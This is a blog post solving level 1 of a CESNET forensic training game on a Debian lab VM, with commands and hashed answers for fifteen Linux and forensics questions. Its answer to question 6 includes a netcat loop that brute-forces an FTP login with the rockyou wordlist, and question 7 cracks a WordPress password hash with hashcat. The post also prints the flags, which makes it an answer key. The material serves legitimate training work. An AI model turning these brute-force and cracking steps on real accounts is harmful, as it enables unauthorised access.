Forensic Lab Game Zero - Level 1 Results

The goal of the post is to provide solutions for the first level of the game for "hackers" created by forensic lab of CESNET association. With this game CESNET introduces a work of forensic analysts and test your knowledge of Linux OS. They are several assignments and practical tasks included inside Debian image which is available for download here.  The question / answer sheet is located inside the home directory of user kassad.

flab-virtual-pc

Picture 1 - Answer Sheet

1. In the Linux image, which username is logged in automatically on boot?

Check the desktop environment.

kassad@debian1989:~$ echo $DESKOP_SESSION
gnome-fallback

Check if automated login is enabled for Gnome desktop.

kassad@debian1989:~$ grep 'AutomaticLogin' /etc/gdm3/daemon.conf
AutomaticLoginEnable = true
AutomaticLogin = kassad

The automated login is enabled for the user kassad.  Now we need to compute the sha1 hash for the result.

kassad@debian1989:~$ echo -n 'kassad' | sha1sum
fb1216c760d6c0996991108886d1797d8bd4ca27

2. On the provided Linux image, what is the “ls” command aliased to for user from question 1 ?

kassad@debian1989:~$ type ls
ls is aliased to `ls --color=auto'

We can get the result also by checking the content of the file /home/kassad/.bashrc.

kassad@debian1989:~$ grep 'alias ls' /home/kassad/.bashrc
alias ls='ls --color=auto'

kassad@debian1989:~$ echo -n 'ls --color=auto' | sha1sum
b870e1ea6c6a5a9927698399ddf7a328a617b60b

3. Which of the following commands are build into the Bash shell ? - cat, ls, echo, awk

kassad@debian1989:~$ type cat ls echo awk | grep builtin
echo is a shell builtin

kassad@debian1989:~$ echo -n echo | sha1sum
b2d21e771d9f86865c5eff193663574dd1796c8f

4. Which non-root user on the Linux image can execute /bin/bsd-csh?

Check privileges.

kassad@debian1989:~$ ls -l /bin/bsd-csh
-rwxr-x--- 1 root lamia 143144 Jul 18 2014 /bin/bsd-csh

Find who is member of the group lamia.

kassad@debian1989:~$ grep 'lamia' /etc/group
lamia:x:1001:

Check the name of the user with uid=1001.

kassad@debian1989:~$ cat /etc/passwd | grep 1001
uid=1001(lamia) gid=1001(lamia) groups=1001(lamia)

kassad@debian1989:~$ echo -n 'lamia' | sha1sum
6199c572a2fb4d26b437c850b1ffab359c74ee7d

5. Which command will open the manual page for nmap ?

kassad@debian1989:~$ echo -n 'man nmap' | sha1sum
8b0d7813c48ccef9d896082da2244c9ab851b465

6. There is an FTP service running on the provided Linux VM, use list of known weak passwords from one of the tools located in /opt/tools/ to recover the password for the account dure and retrieve content of flag.txt from his home directory

a) Extract dictionary

kassad@debian1989:~$ cp /opt/tool/rockyou.txt.bz2 /home/kassad/
kassad@debian1989:~$ bzip2 -d rockyou.txt.bz2

b) FTP server bruteforce script

The script uses nc to connect to FTP server on localhost with passwords from the file rockyou.txt and username dure. If the script detects exit code 230 (successful connect) the password is shown and script finishes.

kassad@debian1989:~$ while read lines; do echo "trying: $lines"; echo -e "USER dure\nPASS $lines\nQUIT" | nc localhost 21 | grep -q "230" && echo "pass: $lines" && break; done < rockyou.txt

pass for user dure is a1b2c3

c) Connect to FTP server and download file flag.txt

kassad@debian1989:~$ ftp -n localhost 21
ftp> user dure
Password:
230 Login successful.
ftp> mget flag.txt

kassad@debian1989:~$ cat flag.txt
da79c8dd34410073244ef8c85cf6da726f19d230

kassad@debian1989:~$ echo -n 'da79c8dd34410073244ef8c85cf6da726f19d230' | sha1sum
0087361acf5d7b79698c5e80619bfc31a9e482c8

7. A backup of a WordPress database is located in your home directory. Recover a plaintext password for admin acount. For offline cracking a long dictionaries are typically used

a) Locate hash
The following line in the file wordpress.sample.sql contains hash for user admin.

INSERT INTO `wp_users` VALUES (1,'admin','$P$BKNIHw43WhqEgh/1jjRa1pMnDMIlbT0','admin','admin@localhost.loc','','2013-03-27 16:30:57','',0,'admin');

The hash is: $P$BKNIHw43WhqEgh/1jjRa1pMnDMIlbT0

b) Identify hash

Here is the Hash online identifier. Your hash may be one of the following:

- phpass, MD5(WordPress), MD5(phpBB3)

c) Install Hashcat

I have installed the Hashcat on host computer to speed up hash cracking process.

$ wget https://hashcat.net/files_legacy/hashcat-2.00.7z
$ mkdir hashcat
$ mv hashcat-2.00.7z hashcat
$ cd hashcat/
$ 7z e hashcat-2.00.7z

d) Crack hash with Hashcat

$ ./hashcat-cli64.bin -m 400 /home/brezular/Downloads/forenzna/hash.txt /home/brezular/Downloads/forenzna/rockyou.txt
$P$BKNIHw43WhqEgh/1jjRa1pMnDMIlbT0:budakbageur

Password for user admin is budakbageur.

$ echo -n 'budakbageur' | sha1sum
3a2ba7a9f619789219bc0eced636433b526441f6

8. There are two texfiles in /home/kassad directory, system_hashes_baseline and system_hashes_incident0. Using those information find the probable file which was added during the security incident. Use SHA1 of the file as answer

a) Count the words in both files

kassad@debian1989:~$ wc -l  system_hashes_incident0.txt system_hashes_baseline.txt
313 system_hashes_incident0.txt
312 system_hashes_baseline.txt
625 total

Now we are sure that a file filesystem_hashes_incident0.txt has plus one hash comparing to the original hash filesystem_hashes_baseline.txt. All we need to do is to compare every line from the file filesystem_hashes_incident0.txt filesystem_hashes_incident0.txt  with the content of the original file. If the line is not found, we have our hash.

kassad@debian1989:~$ while read line; do hash1=$(echo "$line"| cut -d " " -f1); grep -q "$hash1" system_hashes_baseline.txt; rval="$?"; [ "$rval" == 1 ] && echo "$line"; done < /home/kassad/system_hashes_incident0.txt

7ff56d9d0b8c4fc0a1a62e452ba93b43b30ce483 /bin/netcat.real

The file /bin/netcat.real was added by attacker.

kassad@debian1989:~$ echo -n '7ff56d9d0b8c4fc0a1a62e452ba93b43b30ce483' | sha1sum
739d4694ef6f9272b40bea5ac3c7aa355f6d1a12

9. Found most active attacker from the given logfile /home/kassad/auth.log

kassad@debian1989:~$ grep -o -w '[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}' auth.log | sort | uniq -c | sort -bgr

57 84.45.123.3

The most active attacker has IP address 84.45.123.3.

kassad@debian1989:~$ echo -n '84.45.123.3' | sha1sum
a774905567b7200116dac0b82ccd1da893d99588

10. What type of file is /home/kassad/somefile - disk image, zip file, text file, HTML page

kassad@debian1989:~$ file /home/kassad/somefile
somefile: DOS/MBR boot sector, code offset 0x3e+2, OEM-ID "MSWIN4.0", root entries 224, sectors 2880 (volumes <=32 MB) , sectors/FAT 9, sectors/track 18, serial number 0x350518e3, label: "BOOT95A ", FAT (12 bit), followed by FAT

kassad@debian1989:~$ echo -n 'disk image' | sha1sum
19d43c36d41667b1b63e1220cfc8498605f9ffcc -

11. Mount the drive image located in your home directory and retrieve content of flag.txt stored inside. Administrator of virtual machine already gave you permissions to run mount and unmount commands as root

kassad@debian1989:~$ mkdir mount
kassad@debian1989:~$ sudo mount -t vfat somefile mount/

kassad@debian1989:~$ cat /home/kassad/mount/flag.txt
75df0cfbc5757721f18f3ab1b3b0603ff0c1644f

kassad@debian1989:~$ echo -n '75df0cfbc5757721f18f3ab1b3b0603ff0c1644f' | sha1sum
eaf5a724482071ce1c6093d59c860794f6ddc3e6

12. There is another file hidden inside provided disk image, find it and retrieve flag from it's metadata

kassad@debian1989:~$ exiftool -r /home/kassad/mount/.hype.jpg | grep Comment | cut -d ":" -f2
548f59ce9ad3b8d0ce477ff51a0eddbad474022e

kassad@debian1989:~$ echo -n '548f59ce9ad3b8d0ce477ff51a0eddbad474022e' | sha1sum
1966dd5809116e4db1bbe7cd06e60808c9252ccd

13. Which of the user's of provided VM is equivalent to root from Linux perspective?

kassad@debian1989:~$ cat /etc/passwd | grep -w '0'
root:x:0:0:root:/root:/bin/bash
simmons:x:0:1002:,,,:/home/simmons:/bin/bash

User simmons has id 0 so he has root privileges.

kassad@debian1989:~$ echo -n simmons | sha1sum
cabbd2045c248eb63d96d785badf13e001e7b5c6

14. User kassad can run several programs using sudo. Based on commands available, find and retrieve the flag

kassad@debian1989:~$ sudo -l -U kassad

User kassad may run the following commands on debian1989:
(root) NOPASSWD: /bin/mount, /bin/umount
(lamia) NOPASSWD: /usr/bin/get_a_flag

kassad@debian1989:~$ sudo -u lamia /usr/bin/get_a_flag
Here is your flag lamia: 87df8cb351dc718369ae900297bafbb33fffa28e

kassad@debian1989:~$ echo -n '87df8cb351dc718369ae900297bafbb33fffa28e' | sha1sum 6076243406b4cd05b9dc7fcfaaab7fcea8438c5e

15. Find a flag set in the kernel's command line arguments

kassad@debian1989:~$ cat /proc/cmdline
BOOT_IMAGE=/boot/vmlinuz-3.16.0-4-amd64 root=UUID=d6afdc70-c685-4545-a442-bffa3c4a0170 ro quiet 49c11fb5e18585445a5d121b35a4ea138c327489

kassad@debian1989:~$ echo -n '49c11fb5e18585445a5d121b35a4ea138c327489' | sha1sum ea557ae465386d60e2c46273b8d8abafad01972a

End of level 1.

Leave a comment

Your email address will not be published. Required fields are marked *